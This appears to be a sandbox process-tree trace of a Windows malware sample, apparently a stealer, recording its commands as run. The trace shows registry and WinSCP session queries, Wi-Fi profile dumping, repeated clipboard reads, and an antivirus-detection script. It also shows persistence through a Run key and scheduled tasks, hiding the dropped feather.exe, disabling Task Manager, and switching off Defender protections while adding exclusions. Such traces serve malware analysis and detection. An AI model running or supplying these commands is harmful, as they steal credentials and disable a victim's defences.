C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""2⤵PID:2304
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"3⤵PID:3736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""2⤵PID:4864
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"3⤵PID:3712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""2⤵PID:4924
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"3⤵PID:3792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""2⤵PID:2980
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"3⤵PID:4204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""2⤵PID:2472
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"3⤵PID:4824
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""2⤵PID:920
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"3⤵PID:4736
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""2⤵PID:1288
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"3⤵PID:4076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""2⤵PID:4544
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"3⤵PID:1360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""2⤵PID:848
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"3⤵PID:2920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""2⤵PID:1608
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"3⤵PID:2208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""2⤵PID:4452
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"3⤵PID:432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""2⤵PID:3284
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"3⤵PID:4444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""2⤵PID:2352
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"3⤵PID:2752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""2⤵PID:4636
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"3⤵PID:2692
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}""2⤵PID:2412
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{71024AE4-039E-4CA4-87B4-2F64180401F0}"3⤵PID:4368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""2⤵PID:4464
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"3⤵PID:808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""2⤵PID:2868
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"3⤵PID:3144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""2⤵PID:2372
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"3⤵PID:3432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""2⤵PID:1792
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"3⤵PID:3920
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""2⤵PID:3256
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"3⤵PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""2⤵PID:4620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"3⤵PID:3220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""2⤵PID:1900
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"3⤵PID:64
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""2⤵PID:2616
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"3⤵PID:4924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""2⤵PID:4824
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"3⤵PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""2⤵PID:2552
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"3⤵PID:4184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""2⤵PID:2356
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"3⤵PID:1560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""2⤵PID:1380
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"3⤵PID:3504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""2⤵PID:2920
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"3⤵PID:3356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1""2⤵PID:1608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\rjPePv20tUXH_tezmp.ps1"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "mullvad account get"2⤵PID:2752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""2⤵PID:3100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "function Get-AntiVirusProduct {3⤵
- Command and Scripting Interpreter: PowerShell
PID:1284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1512
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"2⤵PID:2692
-
C:\Windows\system32\netsh.exenetsh wlan show profile3⤵PID:3048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""2⤵PID:2964
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"3⤵PID:4820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f"2⤵PID:1344
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupqfB3Eu /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe /f3⤵
- Adds Run key to start application
PID:4244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest"2⤵PID:4444
-
C:\Windows\system32\cmd.execmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest3⤵PID:2056
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn WindowsDriverSetupqfB3Eu /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\" /F /rl highest4⤵
- Creates scheduled task(s)
PID:2232
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\"""2⤵PID:2660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe\""3⤵
- Command and Scripting Interpreter: PowerShell
PID:496 -
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\feather.exe4⤵
- Views/modifies file attributes
PID:2964
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell -command " $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\feather.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask ""2⤵PID:5088
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "3⤵
- Command and Scripting Interpreter: PowerShell
PID:4704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"2⤵PID:4804
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵PID:4864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs"2⤵PID:668
-
C:\Windows\system32\cscript.execscript C:\Users\Admin\AppData\Roaming\J8MYoXP5tVFg.vbs3⤵PID:2016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "2⤵PID:2340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend3⤵PID:808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"3⤵
- Command and Scripting Interpreter: PowerShell
PID:2296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator"2⤵PID:4388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut3zQO7.ps1" -RunAsAdministrator3⤵
- Command and Scripting Interpreter: PowerShell
PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe""2⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:4876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4764
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1676
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2660
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3192
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:2952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:32
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:2412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:1116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:5100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:1480
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:3324
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:396
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"2⤵PID:4880
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard3⤵PID:4788
-
